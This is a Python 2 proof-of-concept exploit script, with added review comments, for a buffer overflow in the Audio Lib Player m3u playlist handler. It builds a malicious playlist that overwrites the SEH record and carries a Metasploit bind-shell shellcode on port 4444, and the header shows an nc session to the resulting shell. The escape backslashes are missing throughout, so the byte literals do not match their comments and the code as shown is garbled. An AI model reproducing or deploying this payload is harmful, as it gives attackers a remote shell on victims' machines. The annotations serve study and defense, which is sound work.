# Title : Audio Lib Player (m3u File) Buffer Overflow Exploit (SEH)
# Published : 2009-09-09
# Author : Blake
# Audio Lib Player m3u SEH overwrite
# product: http://www.toocharger.com/telecharger/logiciels/audio-lib-player/19056.htm
# Usage: Create playlist, load exploit.m3u and connect to shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\blake\Desktop\ALP>
import sys

# Python 2 script (bare `print` statements): a 2009 proof of concept that
# writes a single .m3u playlist entry sized to overwrite the player's SEH
# record when the file is loaded.
# NOTE(review): in this copy the backslash of every escape sequence is
# missing ("n", "x41", "x90", ...), so the literals below are plain ASCII
# letters and digits; the byte values named in the inline comments do not
# describe what this text actually writes.
print "n[*] Audio Lib Player m3u SEH Overwrite"
print "[*] Written by Blake"
print "[*] Tested on Windows XP SP3n"

# Shellcode blob as published; per the author's header it is metasploit
# windows/shell_bind_tcp, x86/alpha_mixed encoded, 695 bytes, LPORT=4444.
# Adjacent string literals inside the parentheses are concatenated by the
# parser into one string.
shellcode = (
"xddxc1xd9x74x24xf4x5fx57x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx42x4ax4ax4bx50x4dx4ax48x4bx49x4bx4fx4bx4f"
"x4bx4fx45x30x4cx4bx42x4cx51x34x47x54x4cx4bx47"
"x35x47x4cx4cx4bx43x4cx45x55x43x48x45x51x4ax4f"
"x4cx4bx50x4fx45x48x4cx4bx51x4fx47x50x45x51x4a"
"x4bx51x59x4cx4bx46x54x4cx4bx45x51x4ax4ex46x51"
"x49x50x4ax39x4ex4cx4cx44x49x50x44x34x45x57x49"
"x51x49x5ax44x4dx45x51x48x42x4ax4bx4bx44x47x4b"
"x46x34x47x54x47x58x43x45x4dx35x4cx4bx51x4fx46"
"x44x43x31x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4b"
"x51x4fx45x4cx45x51x4ax4bx44x43x46x4cx4cx4bx4b"
"x39x42x4cx51x34x45x4cx43x51x49x53x50x31x49x4b"
"x45x34x4cx4bx51x53x46x50x4cx4bx51x50x44x4cx4c"
"x4bx42x50x45x4cx4ex4dx4cx4bx51x50x43x38x51x4e"
"x45x38x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4fx48"
"x56x42x46x50x53x43x56x43x58x50x33x50x32x43x58"
"x43x47x43x43x47x42x51x4fx51x44x4bx4fx48x50x45"
"x38x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx4ex36"
"x51x4fx4bx39x4dx35x45x36x4dx51x4ax4dx43x38x44"
"x42x50x55x43x5ax44x42x4bx4fx4ex30x43x58x49x49"
"x43x39x4cx35x4ex4dx50x57x4bx4fx48x56x51x43x46"
"x33x46x33x46x33x50x53x50x43x51x43x51x53x50x53"
"x4bx4fx48x50x42x46x42x48x42x31x51x4cx43x56x46"
"x33x4cx49x4bx51x4dx45x45x38x4ex44x44x5ax42x50"
"x48x47x51x47x4bx4fx49x46x43x5ax44x50x46x31x46"
"x35x4bx4fx4ex30x42x48x4ex44x4ex4dx46x4ex4dx39"
"x50x57x4bx4fx49x46x51x43x51x45x4bx4fx4ex30x45"
"x38x4bx55x51x59x4bx36x51x59x50x57x4bx4fx49x46"
"x46x30x46x34x50x54x51x45x4bx4fx48x50x4dx43x45"
"x38x4ax47x43x49x48x46x44x39x50x57x4bx4fx48x56"
"x50x55x4bx4fx48x50x43x56x42x4ax45x34x43x56x43"
"x58x43x53x42x4dx4cx49x4ax45x43x5ax50x50x46x39"
"x46x49x48x4cx4bx39x4dx37x43x5ax50x44x4cx49x4b"
"x52x46x51x49x50x4bx43x4ex4ax4bx4ex47x32x46x4d"
"x4bx4ex51x52x46x4cx4ax33x4cx4dx43x4ax50x38x4e"
"x4bx4ex4bx4ex4bx43x58x44x32x4bx4ex4ex53x45x46"
"x4bx4fx43x45x47x34x4bx4fx4ex36x51x4bx46x37x51"
"x42x50x51x50x51x50x51x43x5ax43x31x50x51x46x31"
"x51x45x50x51x4bx4fx48x50x45x38x4ex4dx48x59x43"
"x35x48x4ex46x33x4bx4fx4ex36x42x4ax4bx4fx4bx4f"
"x46x57x4bx4fx48x50x4cx4bx46x37x4bx4cx4bx33x49"
"x54x45x34x4bx4fx48x56x46x32x4bx4fx4ex30x45x38"
"x4cx30x4dx5ax44x44x51x4fx50x53x4bx4fx49x46x4b"
"x4fx48x50x41x41")

# Segments of the crafted playlist, in the order the single file.write()
# below concatenates them (roles are those stated in the author's comments):
# filler up to the SEH record, nop sled, shellcode, near jump back into the
# sled, the two 4-byte SEH record fields (next-SEH short jump, handler
# address), then trailing junk. By the author's byte counts the written
# entry is about 1.8 KB on one line.
# Defender note: overwriting an SEH record with a pop/pop/ret gadget is the
# technique SafeSEH, SEHOP and DEP were introduced to defeat, and a playlist
# entry of this length with no path content is a simple malformed-input
# indicator for content inspection.
payload = "x41" * 420 # seh overwritten at 1224
nops = "x90" * 100 # Nop Sled
sc = shellcode # bind shell 695 bytes
near_jmp = "xe9x10xfdxffxff" # near jump back -752 bytes
seh = "x6ax19x9ax0f" # 0x0f9a196a pop ebp; pop ebx; ret from [C:\WINDOWS\system32\VBAJET32.dll]
next_seh = "xebxf9xffxff" # short jump back -7
junk = "x43" * 572 # junk buffer

print "[+] Creating malicious playlist"
try:
    # `file` shadows the Python 2 builtin of the same name for the rest of
    # the script.
    file = open("exploit.m3u",'w')
    file.write(payload + nops + sc + near_jmp + next_seh + seh + junk)
    file.close()
    print "[+] File created successfully"
except:
    # Bare except: catches every exception (including KeyboardInterrupt),
    # hides the actual error, and exits with status 0, so a failed write is
    # indistinguishable from success to a calling shell.
    print "[x] Could not create file"
    sys.exit(0)